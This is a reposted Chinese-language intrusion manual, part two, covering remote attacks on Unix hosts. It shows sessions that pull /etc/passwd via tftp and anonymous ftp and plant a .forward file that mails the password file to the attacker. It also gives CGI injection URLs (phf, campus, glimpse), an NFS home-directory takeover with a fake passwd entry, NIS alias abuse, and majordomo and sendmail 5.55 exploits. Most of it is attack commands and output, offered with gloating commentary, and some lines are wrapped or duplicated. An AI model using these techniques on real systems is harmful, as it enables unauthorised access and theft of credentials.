網絡入侵實用戰術手冊alpha (2)

網絡入侵實用戰術手冊alpha (2)

轉自INTERNET

二、隔山打牛（遠程攻擊）
1) 隔空取物:取得passwd
1.1) tftp

# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit

(samsa:一無所獲,但是...)

# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation

(samsa:成功了!!!;-)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh

(samsa:可惜是shadow過了的:-/)

1.2) 匿名ftp
1.2.1) 直接獲得

# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:

(samsa:your e-mail address,當然，是假的:->)

230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false

(samsa:正常!把完整的 passwd 放在匿名ftp目錄下的笨蛋太少了)

1.2.2) ftp 主目錄可寫

# cat forward_sucker_file
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]"
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged] 230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail [email protected]

(samsa:等著passwd文件隨郵件來到吧...)

1.3) WWW
著名的cgi大bug
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\mailto:@my.e-mail.
addr\
(samsa:行太長,折了折,不要緊吧? 😉

1.4) nfs
1.4.1) 如果把/etc共享出來，就不必說了
1.4.2) 如果某用戶的主目錄共享出來

# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
$ cat >.forward
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]"
^D
# echo test | mail zw@numen

(samsa:等著你的郵件吧....)

1.5) sniffer
利用ethernet的廣播性質，偷聽網絡上經過的IP包，從而獲得口令。
關於sniffer的原理和技術細節，見[samsa 1999].

(samsa:沒什麼意思,有種``勝之不武''的感覺...)

1.6) NIS
1.6.1) 猜測域名，然後用ypcat(或對於NIS+:niscat)可獲得passwd（甚至shadow）
1.6.2) 若能控制NIS服務器，可創建郵件別名

nis-master # echo 'foo: "| mail [email protected] > /etc/alias
s
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v [email protected]

1.7) e-mail
e.g.利用majordomo(ver. 1.94.3)的漏洞
Reply-to: a~.`/usr/bin/rcp\${IFS}[email protected]:script\${IFS}/tmp
/script;;source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail

# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]
#

1.8) sendmail
利用sendmail 5.55的漏洞:

# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail [email protected] 250 "|/bin/mail [email protected] rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.

(samsa:wait...)